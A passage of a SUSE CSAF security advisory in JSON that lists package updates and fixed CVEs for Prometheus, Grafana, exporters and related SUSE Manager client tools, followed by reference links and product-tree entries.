"text": "This update fixes the following issues:\n\ndracut-saltboot:\n\n- Version update to 1.1.0:\n\n * Retry DHCP requests up to 3 times (bsc#1253004)\n\ngolang-github-QubitProducts-exporter_exporter:\n\n- Non-customer-facing optimization and update\n\ngolang-github-boynux-squid_exporter:\n\n- Version update from 1.6.0 to 1.13.0 with the following highlighted changes and fixes (jsc#PED-14971):\n\n * Added compatibility for Squid 6 and support for the squid-internal-mgr metrics path\n * Added TLS and Basic Authentication to the exporter\u2019s web interface\n * Added support for the exporter to authenticate against the Squid proxy itself\n * Allow the gathering of process information without requiring root privileges\n * The exporter can now be configured using environment variables\n * Added support for custom labels to all exported metrics for better data filtering\n * New metrics to track if Squid is running (squid_up), how long a scrape takes, and if any errors occurred\n * Added \u0027service time\u0027 metrics to analyze proxy speed and performance.\n * Added a metric for open file descriptors (process_open_fds) to help prevent connection bottlenecks\n * Corrected the squid_client_http_requests_total metric to ensure accurate reporting\n\n\ngolang-github-lusitaniae-apache_exporter:\n\n- Version update from 1.0.8 to 1.0.10:\n\n * Updated github.com/prometheus/client_golang to 1.21.1\n * Updated github.com/prometheus/common to 0.63.0\n * Updated github.com/prometheus/exporter-toolkit to 0.14.0\n * Fixed signal handler logging\n\ngolang-github-prometheus-prometheus:\n\n- Security issues fixed:\n\n * CVE-2026-27606: Fixed arbitrary file write via path traversal in rollup (bsc#1258893)\n * CVE-2026-25547: Fixed unbounded brace range expansion leading to excessive CPU and memory consumption (bsc#1257841)\n * CVE-2026-1615, CVE-2025-61140 The old web UI is no longer built due to security issues (bsc#1257897, bsc#1257442)\n * CVE-2025-13465: Bump lodash package to version 4.17.23 to fix prototype pollution vulnerability (bsc#1257329)\n * CVE-2025-12816: Interpretation conflict vulnerability allowing bypassing cryptographic verifications (bsc#1255588)\n\n- Version update from 2.53.4 to 3.5.0 with the following highlighted changes (jsc#PED-13824):\n\n * Modernized Interface: Introduced a brand-new UI\n * Enhanced Cloud and Auth: Added unified AWS service discovery (EC2, ECS, Lightsail) and Azure Workload Identity support\n for more secure, native cloudauthentication.\n * Performance Standards: Fully integrated OpenTelemetry (OTLP) ingestion and moved Native Histograms from experimental\n to a stable feature.\n * Advanced Data Export: Rolled out Remote Write 2.0, offering better performance and metadata handling when sending\n data to external systems.\n * Query Power: Added new PromQL functions (like first_over_time and last_over_time) and optimization for grouping\n operations\n * Better Visibility: The UI now displays detailed relabeling steps, scrape intervals, and timeouts, making it easier\n to troubleshoot why targets aren\u0027t reporting correctly.\n * Critical Fixes: Resolved significant memory leaks related to query logging and fixed bugs where targets were\n accidentally being scraped multiple times\n\ngrafana:\n\n- Security issues fixed:\n\n * CVE-2026-21722: Public dashboards annotations: use dashboard timerange if time selection disabled (bsc#1258136)\n * CVE-2026-21721: Fixed access control by the dashboard permissions API (bsc#1257337)\n * CVE-2026-21720: Fixed unauthenticated DoS (bsc#1257349)\n * CVE-2025-68156: Fixed potential DoS via unbounded recursion in builtin functions (bsc#1255340)\n * CVE-2025-3415: Fixedexposure of DingDing alerting integration URL to Viewer level users (bsc#1245302)\n\n- Version update from 11.5.10 to 11.6.11 with the following highlighted changes and fixes:\n \n * Performance Boost: Introduced WebGL-powered geomaps for smoother map visualizations and\n removed blurred backgrounds from UI overlays to speed up the interface\n * One-Click Actions: Visualizations now support faster navigation via one-click links and actions\n * Alerting History: Added version history for alert rules, allowing you to track changes over time\n * Service Accounts: Automated the migration of old API keys to more secure Service Accounts upon startup\n * Cron Support: Annotations now support Cron syntax for more flexible scheduling\n * Identity and Auth: Hardened the Avatar feature (now requires sign-in) and fixed several login redirection issues\n when Grafana is hosted on a subpath\n * Data Source Support: Added support for Cloud Partner Prometheus data sources and improved Azure legend formatting\n * Alerting Limits: Added size limits for expanded notification templates to prevent system strain\n * RBAC: Integrated Role-Based Access Control (RBAC) into the Alertmanager via the reqAction field\n * Data Consistency: Fixed several issues with Graphite and InfluxDB regarding how variables are handled in repeated\n rows or nested queries\n * Dashboard Reliability: Resolved bugs involving row repeats and \u0027self-referencing\u0027 data links\n * Alerting Fixes: Patched a critical \u0027panic\u0027 (crash) caused by a race condition in alert rules and fixed issues where\n contact points weren\u0027t working correctly\n * URL Handling: Fixed a bug where \u0027true\u0027 values in URL parameters weren\u0027t being read correctly\n\nprometheus-blackbox_exporter:\n\n- Non-customer-facing optimization and update\n\nspacecmd:\n\n- Version update to 5.0.15:\n\n * Fixed typo in spacecmd help ca-cert flag (bsc#1253174)\n * Convert cached IDs to integer values (bsc#1251995)\n * Fixed spacecmd binary file upload (bsc#1253659)\n\nuyuni-tools:\n\n- Version update to 0.1.38:\n\n * Fixed cobbler configuration when migrating to standalone files (bsc#1256803)\n * Detect custom apache and squid config in the /etc/uyuni/proxy folder\n * Add ssh tuning to configure sshd (bsc#1253738)\n * Ignore supportconfig errors (bsc#1255781)\n * Bumped the default image tag to 5.0.7\n * Removed cgroup mount for podman containers (bsc#1253347)\n * Registry flag can be a string (bsc#1254589)\n * Use static supportconfig name to avoid dynamic search (bsc#1257941)\n\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1013,SUSE-SLE-Manager-Tools-15-2026-1013,SUSE-SLE-Manager-Tools-For-Micro-5-2026-1013,SUSE-SLE-Module-Packagehub-Subpackages-15-SP7-2026-1013,openSUSE-SLE-15.6-2026-1013",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1013-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1013-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261013-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1013-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024917.html"
},
{
"category": "self",
"summary": "SUSE Bug 1245302",
"url": "https://bugzilla.suse.com/1245302"
},
{
"category": "self",
"summary": "SUSE Bug 1251995",
"url": "https://bugzilla.suse.com/1251995"
},
{
"category": "self",
"summary": "SUSE Bug 1253004",
"url": "https://bugzilla.suse.com/1253004"
},
{
"category": "self",
"summary": "SUSE Bug 1253174",
"url": "https://bugzilla.suse.com/1253174"
},
{
"category": "self",
"summary": "SUSE Bug 1253347",
"url": "https://bugzilla.suse.com/1253347"
},
{
"category": "self",
"summary": "SUSE Bug 1253659",
"url": "https://bugzilla.suse.com/1253659"
},
{
"category": "self",
"summary": "SUSE Bug 1253738",
"url": "https://bugzilla.suse.com/1253738"
},
{
"category": "self",
"summary": "SUSE Bug 1254589",
"url": "https://bugzilla.suse.com/1254589"
},
{
"category": "self",
"summary": "SUSE Bug 1255340",
"url": "https://bugzilla.suse.com/1255340"
},
{
"category": "self",
"summary": "SUSE Bug 1255588",
"url": "https://bugzilla.suse.com/1255588"
},
{
"category": "self",
"summary": "SUSE Bug 1255781",
"url": "https://bugzilla.suse.com/1255781"
},
{
"category": "self",
"summary": "SUSE Bug 1256803",
"url": "https://bugzilla.suse.com/1256803"
},
{
"category": "self",
"summary": "SUSE Bug 1257329",
"url": "https://bugzilla.suse.com/1257329"
},
{
"category": "self",
"summary": "SUSE Bug 1257337",
"url": "https://bugzilla.suse.com/1257337"
},
{
"category": "self",
"summary": "SUSE Bug 1257349",
"url": "https://bugzilla.suse.com/1257349"
},
{
"category": "self",
"summary": "SUSE Bug 1257442",
"url": "https://bugzilla.suse.com/1257442"
},
{
"category": "self",
"summary": "SUSE Bug 1257841",
"url": "https://bugzilla.suse.com/1257841"
},
{
"category": "self",
"summary": "SUSE Bug 1257897",
"url": "https://bugzilla.suse.com/1257897"
},
{
"category": "self",
"summary": "SUSE Bug 1257941",
"url": "https://bugzilla.suse.com/1257941"
},
{
"category": "self",
"summary": "SUSE Bug 1258136",
"url": "https://bugzilla.suse.com/1258136"
},
{
"category": "self",
"summary": "SUSE Bug 1258893",
"url": "https://bugzilla.suse.com/1258893"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-12816 page",
"url": "https://www.suse.com/security/cve/CVE-2025-12816/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-13465 page",
"url": "https://www.suse.com/security/cve/CVE-2025-13465/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-3415 page",
"url": "https://www.suse.com/security/cve/CVE-2025-3415/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-61140 page",
"url": "https://www.suse.com/security/cve/CVE-2025-61140/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68156 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68156/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-1615 page",
"url": "https://www.suse.com/security/cve/CVE-2026-1615/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-21720 page",
"url": "https://www.suse.com/security/cve/CVE-2026-21720/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-21721 page",
"url": "https://www.suse.com/security/cve/CVE-2026-21721/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-21722 page",
"url": "https://www.suse.com/security/cve/CVE-2026-21722/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-25547 page",
"url": "https://www.suse.com/security/cve/CVE-2026-25547/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-27606 page",
"url": "https://www.suse.com/security/cve/CVE-2026-27606/"
}
],
"title": "Security update 5.0.7 for Multi-Linux Manager Client Tools",
"tracking": {
"current_release_date": "2026-03-25T10:11:52Z",
"generator": {
"date": "2026-03-25T10:11:52Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1013-1",
"initial_release_date": "2026-03-25T10:11:52Z",
"revision_history": [
{
"date": "2026-03-25T10:11:52Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"product": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"product_id": "firewalld-prometheus-config-0.1-150000.3.67.1.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"product": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"product_id": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"product": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"product_id": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"product": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"product_id": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.aarch64",
"product": {
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.aarch64",
"product_id": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"product": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"product_id": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"product": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"product_id": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64"
}
},
{
"category": "product_version",
"name": "grafana-11.6.11-150000.1.90.1.aarch64",
"product": {
"name": "grafana-11.6.11-150000.1.90.1.aarch64",
"product_id": "grafana-11.6.11-150000.1.90.1.aarch64"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.38-150000.1.30.1.aarch64",
"product": {
"name": "mgrctl-0.1.38-150000.1.30.1.aarch64",
"product_id": "mgrctl-0.1.38-150000.1.30.1.aarch64"
}
},
{
"category": "product_version",
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"product": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"product_id": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.i586",
"product": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.i586",
"product_id": "firewalld-prometheus-config-0.1-150000.3.67.1.i586"
}
},
{
"category": "product_version",
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.i586",
"product": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.i586",
"product_id": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.i586"
}
},
{
"category": "product_version",
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.i586",
"product": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.i586",
"product_id": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.i586"
}
},
{
"category": "product_version",
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.i586",
"product": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.i586",
"product_id": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.i586"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.i586",
"product": {
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.i586",
"product_id": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.i586"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.i586",
"product": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.i586",
"product_id": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.i586"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.i586",
"product": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.i586",
"product_id": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.i586"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.38-150000.1.30.1.i586",
"product": {
"name": "mgrctl-0.1.38-150000.1.30.1.i586",
"product_id": "mgrctl-0.1.38-150000.1.30.1.i586"
}
},
{
"category": "product_version",
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.i586",
"product": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.i586",
"product_id": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.i586"
}
}
],
"category": "architecture",
"name": "i586"
},
{
"branches": [
{
"category": "product_version",
"name": "dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"product": {
"name": "dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"product_id": "dracut-saltboot-1.1.0-150000.1.65.1.noarch"
}
},
{
"category": "product_version",
"name": "mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"product": {
"name": "mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"product_id": "mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch"
}
},
{
"category": "product_version",
"name": "mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"product": {
"name": "mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"product_id": "mgrctl-lang-0.1.38-150000.1.30.1.noarch"
}
},
{
"category": "product_version",
"name": "mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"product": {
"name": "mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"product_id": "mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch"
}
},
{
"category": "product_version",
"name": "spacecmd-5.0.15-150000.3.142.1.noarch",
"product": {
"name": "spacecmd-5.0.15-150000.3.142.1.noarch",
"product_id": "spacecmd-5.0.15-150000.3.142.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"product": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"product_id": "firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"product": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"product_id": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"product": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"product_id": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"product": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"product_id": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.ppc64le",
"product": {
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.ppc64le",
"product_id": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"product": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"product_id": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"product": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"product_id": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le"
}
},
{
"category": "product_version",
"name": "grafana-11.6.11-150000.1.90.1.ppc64le",
"product": {
"name": "grafana-11.6.11-150000.1.90.1.ppc64le",
"product_id": "grafana-11.6.11-150000.1.90.1.ppc64le"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.38-150000.1.30.1.ppc64le",
"product": {
"name": "mgrctl-0.1.38-150000.1.30.1.ppc64le",
"product_id": "mgrctl-0.1.38-150000.1.30.1.ppc64le"
}
},
{
"category": "product_version",
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"product": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"product_id": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"product": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"product_id": "firewalld-prometheus-config-0.1-150000.3.67.1.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"product": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"product_id": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"product": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"product_id": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"product": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"product_id": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.s390x",
"product": {
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.s390x",
"product_id": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"product": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"product_id": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"product": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"product_id": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x"
}
},
{
"category": "product_version",
"name": "grafana-11.6.11-150000.1.90.1.s390x",
"product": {
"name": "grafana-11.6.11-150000.1.90.1.s390x",
"product_id": "grafana-11.6.11-150000.1.90.1.s390x"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.38-150000.1.30.1.s390x",
"product": {
"name": "mgrctl-0.1.38-150000.1.30.1.s390x",
"product_id": "mgrctl-0.1.38-150000.1.30.1.s390x"
}
},
{
"category": "product_version",
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"product": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"product_id": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"product": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"product_id": "firewalld-prometheus-config-0.1-150000.3.67.1.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"product": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"product_id": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"product": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"product_id": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"product": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"product_id": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.x86_64",
"product": {
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.x86_64",
"product_id": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"product": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"product_id": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"product": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"product_id": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64"
}
},
{
"category": "product_version",
"name": "grafana-11.6.11-150000.1.90.1.x86_64",
"product": {
"name": "grafana-11.6.11-150000.1.90.1.x86_64",
"product_id": "grafana-11.6.11-150000.1.90.1.x86_64"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.38-150000.1.30.1.x86_64",
"product": {
"name": "mgrctl-0.1.38-150000.1.30.1.x86_64",
"product_id": "mgrctl-0.1.38-150000.1.30.1.x86_64"
}
},
{
"category": "product_version",
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"product": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"product_id": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Manager Client Tools 15",
"product": {
"name": "SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15"
}
},
{
"category": "product_name",
"name": "SUSE Manager Client Tools for SLE Micro 5",
"product": {
"name": "SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-manager-tools-micro:5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:packagehub:15:sp7"
}
}
},
{
"category": "product_name",
"name": "openSUSE Leap 15.6",
"product": {
"name": "openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:leap:15.6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "dracut-saltboot-1.1.0-150000.1.65.1.noarch as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch"
},
"product_reference": "dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.aarch64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64"
},
"product_reference": "firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le"
},
"product_reference": "firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.s390x as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x"
},
"product_reference": "firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.x86_64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64"
},
"product_reference": "firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
